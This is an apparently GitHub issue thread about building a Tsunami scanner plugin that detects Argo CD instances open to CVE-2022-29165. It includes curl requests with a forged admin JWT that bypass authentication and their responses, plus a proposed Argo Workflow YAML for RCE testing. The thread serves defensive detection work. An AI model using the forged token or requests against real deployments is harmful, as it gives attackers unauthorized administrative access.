Open maoning opened 3 months ago
I just saw your tweet, working on this issue is exiting for me :))
Hi @JamesFoxxx,
Thank you for picking up this request! Please make sure the following items are completed before the plugin implementation:
Hi, I read the source code of argo-cd and the fix commit of the CVE here and I'm happy that I managed to exploit this CVE.
I tried to find endpoints that an anonymous user can't access And the endpoints that don't need for further setup on argo-cd like install additional applications.
an anonymous user can't get the list of certificates, the request in this case is:
curl -i -s -k -X $'GET' -H $'Host: argocdHOST' -b $'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ' $'https://127.0.0.1:8081/api/v1/certificates'
and the response is:
HTTP/1.1 403 Forbidden
Content-Type: application/json
Date: Mon, 25 Mar 2024 03:24:05 GMT
Content-Length: 110
Connection: close
{"error":"permission denied: certificates, get, ","code":7,"message":"permission denied: certificates, get, "}
however, with the help of the CVE, we can send a request like the following:
curl -i -s -k -X $'GET' -H $'Host: argocdHOST' -b $'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ' $'https://127.0.0.1:8081/api/v1/certificates'
note that the argocd.token
is a forged token.
I can confirm that the response is the same as an authenticated admin:
HTTP/1.1 200 OK
Content-Type: application/json
Grpc-Metadata-Content-Type: application/grpc
Date: Mon, 25 Mar 2024 03:34:04 GMT
Content-Length: 1421
{"metadata":{},"items":[{"serverName":"bitbucket.org","certType":"ssh","certSubType":"ssh-rsa","certData":null,"certInfo":"SHA256:zzXQOXSRBEiUtuE8AikJYKwbHaxvSc0ojez9YXaGp1A"},
.
.
.
@JamesFoxxx Thanks for submitting the testing configs to security-testbeds, they are really helpful for me to understand how Argo CD works as well.
What you proposed could work, but I think we can make this plugin more effective by detecting all exposed Argo services including but not limited to CVE-2022-29165 for max bounty.
Could you check if it is possible to submit a workflow like this to all versions of exposed Argo services:
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
name: ''
generateName: scripts-
spec:
destination:
name: ''
namespace: ''
server: ''
source:
path: ''
repoURL: ''
targetRevision: HEAD
project: ''
entrypoint: tsunami-rce
templates:
- name: tsunami-rce
steps:
- - name: generate
template: gen-printf-bash
- - name: print
template: print-message
arguments:
parameters:
- name: message
value: '{{steps.generate.outputs.result}}'
- name: gen-printf-bash
script:
image: 'debian:9.4'
command:
- bash
source: |
printf %s%s%s TSUNAMI_PAYLOAD_START randomstring TSUNAMI_PAYLOAD_END // Generate from Tsunami payload generator
The plugin will over the following scenarios:
References:
@maoning the links and the payload that you are referring to is the argo workflows not argo cd. I can write a separate plugin for argo workflows, however, which is as much popular as argo cd. argo cd and argo workflows differences: https://github.com/argoproj/argo-workflows/discussions/7435#discussioncomment-1837543 https://github.com/argoproj/argo-workflows/discussions/7435#discussioncomment-2177941
the good news is that I found out how to enable anonymous admin access for argo-cd.
Great, thanks for spotting the difference!
For argo workflow, we have an existing plugin: https://github.com/google/tsunami-security-scanner-plugins/blob/master/google/detectors/exposedui/argoworkflow/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argoworkflow/ExposedArgoworkflowDetector.java
If you see significant value for a separate Argo Workflow plugin, please post it in a separate plugin request, I will review it.
For the current request, if there's no easy way to trigger RCE, then let's move forward with your proposal + anonymous admin access case.
Please submit our participation form and you can start working on the development.
Reference: https://github.com/advisories/GHSA-r642-gv9p-2wjj
Please read the rules of engagement first at https://github.com/google/tsunami-security-scanner-plugins/issues/409.